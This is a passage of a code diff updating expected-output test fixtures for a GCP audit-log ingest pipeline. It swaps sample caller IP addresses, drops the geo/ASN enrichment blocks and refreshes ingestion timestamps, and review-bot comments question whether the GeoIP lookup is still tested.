pe":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} +{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} {"insertId":"94170ac4-6e82-4345-98ad-3c780222d19d","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"94170ac4-6e82-4345-98ad-3c780222d19d","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.core.v1.nodes.list","resource":"core/v1/nodes"}],"methodName":"io.k8s.core.v1.nodes.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"core/v1/nodes","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:47:31.94822935Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:47:07.535383Z"} 
{"insertId":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"","k8s.io/deprecated":"true","k8s.io/removed-release":"1.22"},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"b10a904a-faa4-4e0d-9ec3-7bc6a180196a","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.extensions.v1beta1.ingresses.list","resource":"extensions/v1beta1/namespaces/cos-auditd/ingresses"}],"methodName":"io.k8s.extensions.v1beta1.ingresses.list","requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"GoogleCloudConsole"},"resourceName":"extensions/v1beta1/namespaces/cos-auditd/ingresses","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-23T14:16:36.37362467Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-23T14:16:07.574776Z"} {"insertId":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:public-info-viewer\" of ClusterRole \"system:public-info-viewer\" to Group 
\"system:unauthenticated\""},"logName":"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"e973134d-b4d5-4e2f-92b8-82bba13fdb92","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:anonymous"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.get","resource":"readyz"}],"methodName":"io.k8s.get","requestMetadata":{"callerIp":"127.0.0.1","callerSuppliedUserAgent":"kube-probe/1.19+"},"resourceName":"readyz","serviceName":"k8s.io","status":{}},"receiveTimestamp":"2021-04-29T08:19:21.606980385Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2021-04-29T08:19:20.80581Z"} diff --git a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 5b5ffd3bc31..d9cdef9c1ad 100644 --- a/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/gcp/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json 
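Review bot: Both rewritten records now carry the same caller address, `"callerIp":"67.43.156.13"` on the `v1.compute.images.insert` event and again on the `beta.compute.instances.stop` event, whereas the fixture previously gave them distinct public addresses that yielded different enrichments in the expected output. If the supported subset offers more than one usable address, giving the second event a different one keeps the two `source` blocks distinguishable and exercises the lookup on more than a single value; if the subset really is a single address, this is acceptable as-is but worth stating in the PR description. The private and loopback `callerIp` values elsewhere in the hunk (192.168.1.1, 10.11.12.13, 127.0.0.1) are left untouched, which is consistent with the change being limited to public addresses.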
@@ -50,7 +50,7 @@ }, "event": { "action": "GetResourceBillingInfo", - "ingested": "2021-06-09T10:48:28.604014900Z", + "ingested": "2021-12-09T13:37:42.255753100Z", "original": "{\"insertId\":\"-uihnmjctwo\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"resourcemanager.projects.get\",\"resource\":\"projects/elastic-beats\",\"resourceAttributes\":{}}],\"methodName\":\"GetResourceBillingInfo\",\"request\":{\"@type\":\"type.googleapis.com/google.internal.cloudbilling.billingaccount.v1.GetResourceBillingInfoRequest\",\"resourceName\":\"projects/189716325846\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"destinationAttributes\":{},\"requestAttributes\":{}},\"resourceName\":\"projects/elastic-beats\",\"serviceName\":\"cloudbilling.googleapis.com\",\"status\":{}},\"receiveTimestamp\":\"2019-12-19T00:49:36.313482371Z\",\"resource\":{\"labels\":{\"project_id\":\"elastic-beats\"},\"type\":\"project\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:49:36.086Z\"}", "id": "-uihnmjctwo", "kind": "event", 
@@ -119,7 +119,7 @@ }, "event": { "action": "beta.compute.machineTypes.aggregatedList", - "ingested": "2021-06-09T10:48:28.604039400Z", + "ingested": "2021-12-09T13:37:42.255762300Z", "original": "{\"insertId\":\"-h6onuze1h7dg\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":false,\"permission\":\"compute.machineTypes.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.machineTypes.aggregatedList\",\"numResponseItems\":\"71\",\"request\":{\"@type\":\"type.googleapis.com/compute.machineTypes.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:45:51.711Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/machineTypes\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:45:52.367887078Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.machineTypes.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:45:51.228Z\"}", "id": "-h6onuze1h7dg", "kind": "event", 
@@ -213,7 +213,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-06-09T10:48:28.604046300Z", + "ingested": "2021-12-09T13:37:42.255766900Z", "original": "{\"insertId\":\"yonau2dg2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"response\":{\"@type\":\"core.k8s.io/v1.Status\",\"apiVersion\":\"v1\",\"details\":{\"group\":\"batch\",\"kind\":\"jobs\",\"name\":\"gsuite-exporter-1589294700\",\"uid\":\"2beff34a-945f-11ea-bacf-42010a80007f\"},\"kind\":\"Status\",\"metadata\":{},\"status\":\"Success\"},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau2dg2zi", "kind": "event", 
@@ -298,7 +298,7 @@ }, "event": { "action": "beta.compute.instances.aggregatedList", - "ingested": "2021-06-09T10:48:28.604077200Z", + "ingested": "2021-12-09T13:37:42.255770400Z", "original": "{\"insertId\":\"yonau3dc2zi\",\"logName\":\"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access\",\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"permission\":\"compute.instances.list\",\"resourceAttributes\":{\"name\":\"projects/elastic-beats\",\"service\":\"resourcemanager\",\"type\":\"resourcemanager.projects\"}}],\"methodName\":\"beta.compute.instances.aggregatedList\",\"numResponseItems\":\"61\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.aggregatedList\"},\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2019-12-19T00:44:25.198Z\"}},\"resourceLocation\":{\"currentLocations\":[\"global\"]},\"resourceName\":\"projects/elastic-beats/global/instances\",\"serviceName\":\"compute.googleapis.com\",\"status\":{\"code\":7,\"message\":\"PERMISSION_DENIED\"}},\"receiveTimestamp\":\"2019-12-19T00:44:25.262379373Z\",\"resource\":{\"labels\":{\"location\":\"global\",\"method\":\"compute.instances.aggregatedList\",\"project_id\":\"elastic-beats\",\"service\":\"compute.googleapis.com\",\"version\":\"beta\"},\"type\":\"api\"},\"severity\":\"INFO\",\"timestamp\":\"2019-12-19T00:44:25.051Z\"}", "id": "yonau3dc2zi", "kind": "event", 
@@ -386,7 +386,7 @@ }, "event": { "action": "io.k8s.authorization.v1beta1.subjectaccessreviews.create", - "ingested": "2021-06-09T10:48:28.604083800Z", + "ingested": "2021-12-09T13:37:42.255774900Z", "original": "{\"insertId\":\"87efd529-6349-45d2-b905-fc607e6c5d3b\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"RBAC: allowed by ClusterRoleBinding \\\"cert-manager-webhook:auth-delegator\\\" of ClusterRole \\\"system:auth-delegator\\\" to ServiceAccount \\\"cert-manager-webhook/cert-manager\\\"\"},\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"5555555-6349-45d2-b905-fc607e6c5d3b\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:cert-manager:cert-manager-webhook\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"resource\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\"}],\"methodName\":\"io.k8s.authorization.v1beta1.subjectaccessreviews.create\",\"request\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":false}},\"requestMetadata\":{\"callerIp\":\"10.11.12.13\",\"callerSuppliedUserAgent\":\"webhook/v0.0.0 (linux/amd64) 
kubernetes/$Format\"},\"resourceName\":\"authorization.k8s.io/v1beta1/subjectaccessreviews\",\"response\":{\"@type\":\"authorization.k8s.io/v1beta1.SubjectAccessReview\",\"apiVersion\":\"authorization.k8s.io/v1beta1\",\"kind\":\"SubjectAccessReview\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"group\":[\"system:serviceaccounts\",\"system:serviceaccounts:kube-system\",\"system:authenticated\"],\"nonResourceAttributes\":{\"path\":\"/apis/webhook.cert-manager.io/v1beta1\",\"verb\":\"get\"},\"user\":\"system:serviceaccount:kube-system:resourcequota-controller\"},\"status\":{\"allowed\":true,\"reason\":\"RBAC: allowed by ClusterRoleBinding \\\"system:discovery\\\" of ClusterRole \\\"system:discovery\\\" to Group \\\"system:authenticated\\\"\"}},\"serviceName\":\"k8s.io\",\"status\":{\"code\":0}},\"receiveTimestamp\":\"2020-08-05T21:07:32.157698684Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2020-08-05T21:07:30.974750Z\"}", "id": "87efd529-6349-45d2-b905-fc607e6c5d3b", "kind": "event", @@ -411,19 +411,7 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", - "location": { - "lon": 37.6172, - "lat": 55.7527 - } - }, - "ip": "1.2.3.4" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
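Review bot: The geo enrichment for the new address is no longer asserted: the expected document for `v2spcwdzmc2` loses its entire `source.geo` block and keeps only `"ip": "67.43.156.13"`, instead of swapping the old Moscow values for the test database's values for the new address. If the reason for moving to the supported subset is that the test stack's GeoIP database resolves these addresses (as the changelog description implies), an empty result here suggests the expected file was regenerated against a stack without that database, leaving the pipeline's geoip step unverified by this test. Please regenerate with the GeoIP test database loaded, or, if no enrichment is expected for this address, note that in the PR so the removal is not read later as a pipeline regression.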
@@ -448,7 +436,7 @@ }, "method_name": "v1.compute.images.insert", "request_metadata": { - "caller_ip": "1.2.3.4", + "caller_ip": "67.43.156.13", "caller_supplied_user_agent": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)" }, "response": { 
@@ -483,8 +471,8 @@ }, "event": { "action": "v1.compute.images.insert", - "ingested": "2021-06-09T10:48:28.604089300Z", - "original": "{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"1.2.3.4\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", + "ingested": "2021-12-09T13:37:42.255780100Z", + "original": 
"{\"insertId\":\"v2spcwdzmc2\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"first\":true,\"id\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"compute.images.create\",\"resourceAttributes\":{\"name\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"service\":\"compute\",\"type\":\"compute.images\"}}],\"methodName\":\"v1.compute.images.insert\",\"request\":{\"@type\":\"type.googleapis.com/compute.images.insert\",\"family\":\"windows-server-2016\",\"guestOsFeatures\":[{\"type\":\"VIRTIO_SCSI_MULTIQUEUE\"},{\"type\":\"WINDOWS\"}],\"name\":\"windows-server-2016-v20200805\",\"rawDisk\":{\"source\":\"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz\"},\"sourceType\":\"RAW\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 
19.6.0),gzip(gfe)\",\"destinationAttributes\":{},\"requestAttributes\":{\"auth\":{},\"time\":\"2020-08-05T21:59:27.515Z\"}},\"resourceLocation\":{\"currentLocations\":[\"eu\"]},\"resourceName\":\"projects/foo/global/images/windows-server-2016-v20200805\",\"response\":{\"@type\":\"type.googleapis.com/operation\",\"id\":\"44919313\",\"insertTime\":\"2020-08-05T14:59:27.259-07:00\",\"name\":\"operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"operationType\":\"insert\",\"progress\":\"0\",\"selfLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e\",\"selfLinkWithId\":\"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320\",\"startTime\":\"2020-08-05T14:59:27.274-07:00\",\"status\":\"RUNNING\",\"targetId\":\"12345\",\"targetLink\":\"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805\",\"user\":\"user@mycompany.com\"},\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T21:59:27.822546978Z\",\"resource\":{\"labels\":{\"image_id\":\"771879043\",\"project_id\":\"foo\"},\"type\":\"gce_image\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T21:59:26.456Z\"}", "id": "v2spcwdzmc2", "kind": "event", "outcome": "success" @@ -510,25 +498,7 @@ "logger": "projects/foo/logs/cloudaudit.googleapis.com%2Factivity" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", - "location": { - "lon": 3.0966, - "lat": 45.7838 - } - }, - "as": { - "number": 3215, - "organization": { - "name": "Orange" - } - }, - "ip": "2.3.4.5" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
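Review bot: Neither the city nor the ASN lookup is asserted any more for `-c7ctxmd2zab`: both `source.geo` and `source.as` (previously AS3215 / Orange for the old address) are removed with nothing taking their place. As with the image-insert document in the earlier hunk, an address chosen from the supported subset should yield deterministic test-database values, so their complete absence looks more like a regeneration without the GeoIP databases than a lookup that legitimately returned nothing; confirm which it is before merging. A quick sanity check is to grep the regenerated expected file for any surviving `"geo"` block on a public address: if none remain, the enrichment was not exercised at all.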
@@ -555,7 +525,7 @@
 },
 "method_name": "beta.compute.instances.stop",
 "request_metadata": {
- "caller_ip": "2.3.4.5",
+ "caller_ip": "67.43.156.13",
 "caller_supplied_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"
 },
 "service_name": "compute.googleapis.com",
@@ -568,8 +538,8 @@
 },
 "event": {
 "action": "beta.compute.instances.stop",
- "ingested": "2021-06-09T10:48:28.604095200Z",
- "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"2.3.4.5\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}",
+ "ingested": "2021-12-09T13:37:42.255784900Z",
+ "original": "{\"insertId\":\"-c7ctxmd2zab\",\"logName\":\"projects/foo/logs/cloudaudit.googleapis.com%2Factivity\",\"operation\":{\"id\":\"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831\",\"last\":true,\"producer\":\"compute.googleapis.com\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"user@mycompany.com\"},\"methodName\":\"beta.compute.instances.stop\",\"request\":{\"@type\":\"type.googleapis.com/compute.instances.stop\"},\"requestMetadata\":{\"callerIp\":\"67.43.156.13\",\"callerSuppliedUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 
Firefox/79.0,gzip(gfe),gzip(gfe)\"},\"resourceName\":\"projects/foo/zones/us-central1-a/instances/win10-test\",\"serviceName\":\"compute.googleapis.com\"},\"receiveTimestamp\":\"2020-08-05T16:56:41.315135528Z\",\"resource\":{\"labels\":{\"instance_id\":\"590261181\",\"project_id\":\"foo\",\"zone\":\"us-central1-a\"},\"type\":\"gce_instance\"},\"severity\":\"NOTICE\",\"timestamp\":\"2020-08-05T16:56:40.428Z\"}",
 "id": "-c7ctxmd2zab",
 "kind": "event",
 "outcome": "unknown"
@@ -643,7 +613,7 @@
 },
 "event": {
 "action": "io.k8s.core.v1.nodes.list",
- "ingested": "2021-06-09T10:48:28.604100600Z",
+ "ingested": "2021-12-09T13:37:42.255788900Z",
 "original": "{\"insertId\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"94170ac4-6e82-4345-98ad-3c780222d19d\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.core.v1.nodes.list\",\"resource\":\"core/v1/nodes\"}],\"methodName\":\"io.k8s.core.v1.nodes.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"core/v1/nodes\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:47:31.94822935Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:47:07.535383Z\"}",
 "id": "94170ac4-6e82-4345-98ad-3c780222d19d",
 "kind": "event",
@@ -712,7 +682,7 @@
 },
 "event": {
 "action": "io.k8s.extensions.v1beta1.ingresses.list",
- "ingested": "2021-06-09T10:48:28.604105600Z",
+ "ingested": "2021-12-09T13:37:42.255793600Z",
 "original": "{\"insertId\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"labels\":{\"authorization.k8s.io/decision\":\"allow\",\"authorization.k8s.io/reason\":\"\",\"k8s.io/deprecated\":\"true\",\"k8s.io/removed-release\":\"1.22\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"b10a904a-faa4-4e0d-9ec3-7bc6a180196a\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"xxx@xxx.xxx\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"resource\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\"}],\"methodName\":\"io.k8s.extensions.v1beta1.ingresses.list\",\"requestMetadata\":{\"callerIp\":\"192.168.1.1\",\"callerSuppliedUserAgent\":\"GoogleCloudConsole\"},\"resourceName\":\"extensions/v1beta1/namespaces/cos-auditd/ingresses\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-23T14:16:36.37362467Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-23T14:16:07.574776Z\"